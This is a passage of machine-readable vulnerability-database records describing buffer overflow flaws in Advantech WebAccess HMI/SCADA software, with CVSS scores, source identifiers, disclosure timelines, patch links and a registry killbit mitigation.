"cpe:/a:advantech:webaccess%2fnms", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005077" } ] }, "credits": { "_id": null, "data": "Fritz Sands of the Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-18-527" } ], "trust": 0.7 }, "cve": "CVE-2018-8845", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-8845", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2018-8845", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-13781", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2f6d991-39ab-11e9-a20e-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-138877", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-8845", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2018-8845", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-8845", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2018-8845", "trust": 0.8, "value": "Critical" }, { "author": "ZDI", "id": "CVE-2018-8845", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-13781", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201805-441", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "e2f6d991-39ab-11e9-a20e-000c29342cb1", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-138877", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2f6d991-39ab-11e9-a20e-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-527" }, { "db": "CNVD", "id": "CNVD-2018-13781" }, { "db": "VULHUB", "id": "VHN-138877" }, { "db": "JVNDB", "id": "JVNDB-2018-005077" }, { "db": "CNNVD", "id": "CNNVD-201805-441" }, { "db": "NVD", "id": "CVE-2018-8845" } ] }, "description": { "_id": null, "data": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a heap-based buffer overflow vulnerability has been identified, which may allow an attacker to execute arbitrary code. plural Advantech WebAccess The product contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. When parsing the NamedObject structure, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length, heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A heap buffer overflow vulnerability exists in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. An information-disclosure vulnerability\n3. A file-upload vulnerability\n4. Multiple directory-traversal vulnerabilities\n5. Multiple stack-based buffer-overflow vulnerabilities\n6. A heap-based buffer-overflow vulnerability\n7. Multiple arbitrary code-execution vulnerabilities\n8. A denial-of-service vulnerability\n9. A security-bypass vulnerability\n10. A privilege-escalation vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following products and versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier", "sources": [ { "db": "NVD", "id": "CVE-2018-8845" }, { "db": "JVNDB", "id": "JVNDB-2018-005077" }, { "db": "ZDI", "id": "ZDI-18-527" }, { "db": "CNVD", "id": "CNVD-2018-13781" }, { "db": "BID", "id": "104190" }, { "db": "IVD", "id": "e2f6d991-39ab-11e9-a20e-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-138877" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2018-8845", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-18-135-01", "trust": 3.4 }, { "db": "BID", "id": "104190", "trust": 2.6 }, { "db": "CNVD", "id": "CNVD-2018-13781", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201805-441", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-005077", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5897", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-527", "trust": 0.7 }, { "db": "IVD", "id": "E2F6D991-39AB-11E9-A20E-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-138877", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2f6d991-39ab-11e9-a20e-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-527" }, { "db": "CNVD", "id": "CNVD-2018-13781" }, { "db": "VULHUB", "id": "VHN-138877" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005077" }, { "db": "CNNVD", "id": "CNNVD-201805-441" }, { "db": "NVD", "id": "CVE-2018-8845" } ] }, "id": "VAR-201805-1128", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2f6d991-39ab-11e9-a20e-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-13781" }, { "db": "VULHUB", "id": "VHN-138877" } ], "trust": 1.5434040525000001 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f6d991-39ab-11e9-a20e-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-13781" } ] }, "last_update_date": "2024-11-23T21:53:07.443000Z", "patch": { "_id": null, "data": [ { "title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" }, { "title": "Patches for multiple Advantech product heap buffer overflow vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/135205" }, { "title": "Multiple Advantech Product Buffer Error Vulnerability Fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=80051" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-527" }, { "db": "CNVD", "id": "CNVD-2018-13781" }, { "db": "JVNDB", "id": "JVNDB-2018-005077" }, { "db": "CNNVD", "id": "CNNVD-201805-441" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-122", "trust": 1.0 }, { "problemtype": "CWE-119", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-138877" }, { "db": "JVNDB", "id": "JVNDB-2018-005077" }, { "db": "NVD", "id": "CVE-2018-8845" } ] }, "references": { "_id": null, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-135-01" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/104190" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-8845" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8845" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-527" }, { "db": "CNVD", "id": "CNVD-2018-13781" }, { "db": "VULHUB", "id": "VHN-138877" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005077" }, { "db": "CNNVD", "id": "CNNVD-201805-441" }, { "db": "NVD", "id": "CVE-2018-8845" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2f6d991-39ab-11e9-a20e-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-527", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-13781", "ident": null }, { "db": "VULHUB", "id": "VHN-138877", "ident": null }, { "db": "BID", "id": "104190", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2018-005077", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201805-441", "ident": null }, { "db": "NVD", "id": "CVE-2018-8845", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-07-24T00:00:00", "db": "IVD", "id": "e2f6d991-39ab-11e9-a20e-000c29342cb1", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-527", "ident": null }, { "date": "2018-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2018-13781", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "VULHUB", "id": "VHN-138877", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190", "ident": null }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005077", "ident": null }, { "date": "2018-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-441", "ident": null }, { "date": "2018-05-15T22:29:00.723000", "db": "NVD", "id": "CVE-2018-8845", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-527", "ident": null }, { "date": "2018-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2018-13781", "ident": null }, { "date": "2020-09-29T00:00:00", "db": "VULHUB", "id": "VHN-138877", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190", "ident": null }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005077", "ident": null }, { "date": "2020-09-30T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-441", "ident": null }, { "date": "2024-11-21T04:14:26.320000", "db": "NVD", "id": "CVE-2018-8845", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-441" } ], "trust": 0.6 }, "title": { "_id": null, "data": "plural Advantech WebAccess Product buffer error vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005077" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "e2f6d991-39ab-11e9-a20e-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201805-441" } ], "trust": 0.8 } }
var-201708-1583
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.2, "vendor": "advantech", "version": "*" } ], "sources": [ { "db": "IVD", "id": "6347eb03-4c8a-4fce-9b5d-f55130167e75" }, { "db": "ZDI", "id": "ZDI-17-561" }, { "db": "CNVD", "id": "CNVD-2017-19447" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-561" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-561", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-19447", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "6347eb03-4c8a-4fce-9b5d-f55130167e75", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-561", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-19447", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "6347eb03-4c8a-4fce-9b5d-f55130167e75", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "6347eb03-4c8a-4fce-9b5d-f55130167e75" }, { "db": "ZDI", "id": "ZDI-17-561" }, { "db": "CNVD", "id": "CNVD-2017-19447" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "ZDI", "id": "ZDI-17-561" }, { "db": "CNVD", "id": "CNVD-2017-19447" }, { "db": "IVD", "id": "6347eb03-4c8a-4fce-9b5d-f55130167e75" } ], "trust": 1.35 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-561", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2017-19447", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4110", "trust": 0.7 }, { "db": "IVD", "id": "6347EB03-4C8A-4FCE-9B5D-F55130167E75", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "6347eb03-4c8a-4fce-9b5d-f55130167e75" }, { "db": "ZDI", "id": "ZDI-17-561" }, { "db": "CNVD", "id": "CNVD-2017-19447" } ] }, "id": "VAR-201708-1583", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "6347eb03-4c8a-4fce-9b5d-f55130167e75" }, { "db": "CNVD", "id": "CNVD-2017-19447" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "6347eb03-4c8a-4fce-9b5d-f55130167e75" }, { "db": "CNVD", "id": "CNVD-2017-19447" } ] }, "last_update_date": "2022-05-17T02:07:05.693000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\BF28239A-3823-40FF-BC02-2DA4D9DBB1EEIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-561" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" }, { "trust": 0.6, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-561/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-561" }, { "db": "CNVD", "id": "CNVD-2017-19447" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "6347eb03-4c8a-4fce-9b5d-f55130167e75", "ident": null }, { "db": "ZDI", "id": "ZDI-17-561", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-19447", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "6347eb03-4c8a-4fce-9b5d-f55130167e75", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-561", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19447", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-561", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19447", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess TpMegaJVT setCameraName Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "IVD", "id": "6347eb03-4c8a-4fce-9b5d-f55130167e75" }, { "db": "CNVD", "id": "CNVD-2017-19447" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "6347eb03-4c8a-4fce-9b5d-f55130167e75" } ], "trust": 0.2 } }
var-201708-1580
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.2, "vendor": "advantech", "version": "*" } ], "sources": [ { "db": "IVD", "id": "0c0463a3-3e51-4f73-b111-762c78b2bd94" }, { "db": "ZDI", "id": "ZDI-17-560" }, { "db": "CNVD", "id": "CNVD-2017-19448" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-560" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-560", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-19448", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "0c0463a3-3e51-4f73-b111-762c78b2bd94", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-560", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-19448", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "0c0463a3-3e51-4f73-b111-762c78b2bd94", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "0c0463a3-3e51-4f73-b111-762c78b2bd94" }, { "db": "ZDI", "id": "ZDI-17-560" }, { "db": "CNVD", "id": "CNVD-2017-19448" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "ZDI", "id": "ZDI-17-560" }, { "db": "CNVD", "id": "CNVD-2017-19448" }, { "db": "IVD", "id": "0c0463a3-3e51-4f73-b111-762c78b2bd94" } ], "trust": 1.35 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-560", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2017-19448", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4075", "trust": 0.7 }, { "db": "IVD", "id": "0C0463A3-3E51-4F73-B111-762C78B2BD94", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "0c0463a3-3e51-4f73-b111-762c78b2bd94" }, { "db": "ZDI", "id": "ZDI-17-560" }, { "db": "CNVD", "id": "CNVD-2017-19448" } ] }, "id": "VAR-201708-1580", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "0c0463a3-3e51-4f73-b111-762c78b2bd94" }, { "db": "CNVD", "id": "CNVD-2017-19448" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "0c0463a3-3e51-4f73-b111-762c78b2bd94" }, { "db": "CNVD", "id": "CNVD-2017-19448" } ] }, "last_update_date": "2022-05-17T01:57:41.176000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\73888E2B-FF04-416c-8847-984D7FC4507FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-560" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" }, { "trust": 0.6, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-560/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-560" }, { "db": "CNVD", "id": "CNVD-2017-19448" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "0c0463a3-3e51-4f73-b111-762c78b2bd94", "ident": null }, { "db": "ZDI", "id": "ZDI-17-560", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-19448", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "0c0463a3-3e51-4f73-b111-762c78b2bd94", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-560", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19448", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-02-21T00:00:00", "db": "ZDI", "id": "ZDI-17-560", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19448", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess RtspVapgDecoderNew2 SetPaybackFilePath Stack Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "IVD", "id": "0c0463a3-3e51-4f73-b111-762c78b2bd94" }, { "db": "CNVD", "id": "CNVD-2017-19448" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "0c0463a3-3e51-4f73-b111-762c78b2bd94" } ], "trust": 0.2 } }
var-201404-0542
Vulnerability from variot
